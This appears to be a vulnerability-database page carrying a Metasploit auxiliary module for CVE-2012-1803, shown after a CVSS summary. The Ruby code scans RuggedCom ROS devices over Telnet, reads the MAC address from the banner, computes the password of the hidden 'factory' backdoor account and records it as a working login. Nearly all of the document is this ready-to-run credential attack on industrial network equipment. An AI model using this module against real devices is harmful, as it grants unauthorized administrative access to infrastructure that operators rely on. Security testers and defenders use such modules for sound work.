
RuggedCom Telnet Password Generator

2012-05-1309:09:17
Borja Merino <[email protected]>, jc
www.rapid7.com
8

CVSS2

8.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:S/C:C/I:C/A:C

This module will calculate the password for the hard-coded hidden username “factory” in the RuggedCom Rugged Operating System (ROS). The password is dynamically generated from the device's MAC address, which the device discloses in its Telnet banner; no authentication is needed to obtain it.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

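class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Telnet
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Modulus applied to the reversed-MAC integer in mac_to_password. It is part
  # of the ROS "factory" password algorithm as published in the EDB 18779 PoC.
  PASSWORD_MODULUS = 999999929

  # Regex for the MAC address as it appears in the ROS Telnet banner
  # (six dash-separated hex octets, any case).
  BANNER_MAC_RE = /((?:[0-9a-f]{2}[-]){5}[0-9a-f]{2})/i

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'RuggedCom Telnet Password Generator',
      'Description' => %q{
        This module will calculate the password for the hard-coded hidden username
        "factory" in the RuggedCom Rugged Operating System (ROS). The password is
        dynamically generated based on the devices MAC address.
      },
      'References'     =>
        [
          [ 'CVE', '2012-1803' ],
          [ 'EDB', '18779' ],
          [ 'US-CERT-VU', '889195' ]
        ],
      'Author'      => [
        'Borja Merino <bmerinofe[at]gmail.com>',
        'jc' # ExploitDB PoC
        ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(23),
        # Kept for compatibility with existing resource scripts. The derived
        # password is only valid for the hidden "factory" account, so the
        # credential is always reported under that name (see run_host).
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'factory']),
        OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30])
      ])
  end

  # Derive the "factory" account password from the device MAC address.
  #
  # Algorithm (EDB 18779): drop the separators, reverse the octet order,
  # append "0000", read the result as a hexadecimal integer and reduce it
  # modulo PASSWORD_MODULUS. The decimal form of that integer is the password.
  #
  # @param mac [String] MAC address such as "00-0a-dc-01-02-03". "-" and ":"
  #   separators (or none at all) are accepted; hex digits may be either case.
  # @return [String] the generated password as a decimal string.
  def mac_to_password(mac)
    print_status("MAC Address: #{mac}")
    # Pair up the hex digits into octets, then reverse the octet order.
    octets = mac.to_s.delete('-:').each_char.each_slice(2).to_a
    reversed = octets.reverse.join
    reversed << '0000'
    pass = reversed.hex % PASSWORD_MODULUS
    print_status("Password: #{pass}")
    pass.to_s
  end

  # Pull the ROS version and product strings out of the Telnet banner.
  #
  # @param banner [String] sanitised banner text.
  # @return [String] "<Rugged Operating System ...>  <Product: ...>"; a field
  #   the banner does not contain is reported as "unknown" instead of raising.
  def get_info(banner)
    product = banner[/Product:\s*\S*/] || 'Product: unknown'
    so_version = banner[/Rugged Operating System\s\S*/] || 'Rugged Operating System unknown'
    "#{so_version}  #{product}"
  end

  # Store the derived credential in the database as a telnet service login.
  #
  # @param opts [Hash] :ip, :port, :user, :password and :proof (the banner).
  # @return [Metasploit::Credential::Login] the created login record.
  #
  # NOTE(review): the login is recorded as SUCCESSFUL although this module
  # never authenticates to the device; the status reflects confidence in the
  # deterministic CVE-2012-1803 algorithm, not a verified login.
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: 'telnet',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Connect to the Telnet service, identify a ROS banner, derive the "factory"
  # password from the MAC address it discloses and report the credential.
  #
  # @param ip [String] host being scanned.
  # @return [void]
  def run_host(ip)
    # Timeout.timeout treats 0 as "no timeout" and rejects negative values,
    # so fall back to the default for anything non-positive.
    to = datastore['TIMEOUT'].to_i
    to = 30 if to <= 0
    begin
      ::Timeout.timeout(to) do
        connect
        banner_text = Rex::Text.to_hex_ascii(banner.to_s)
        unless banner_text =~ /Rugged Operating System/
          print_status("It doesn't seem to be a RuggedCom service.")
          return
        end

        print_status("#{ip}:#{rport} Calculating Telnet password ...")
        mac = banner_text[BANNER_MAC_RE]
        if mac.nil?
          # A ROS banner without a MAC address gives us nothing to derive from.
          print_error("#{ip}:#{rport} RuggedCom banner found but it contains no MAC address; skipping.")
          return
        end

        password = mac_to_password(mac)
        print_status("#{ip}:#{rport} #{get_info(banner_text)}")
        # The derived password is only meaningful for the hidden "factory" account.
        report_cred(ip: ip, port: rport, user: 'factory', password: password, proof: banner_text)
      end
    rescue ::Rex::ConnectionError
      # Port closed or host unreachable: nothing to report, move on.
    rescue Timeout::Error
      print_error("#{ip}:#{rport}, Server timed out after #{to} seconds. Skipping.")
    ensure
      # connect opened a socket; make sure it is released on every path.
      disconnect
    end
  end
end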
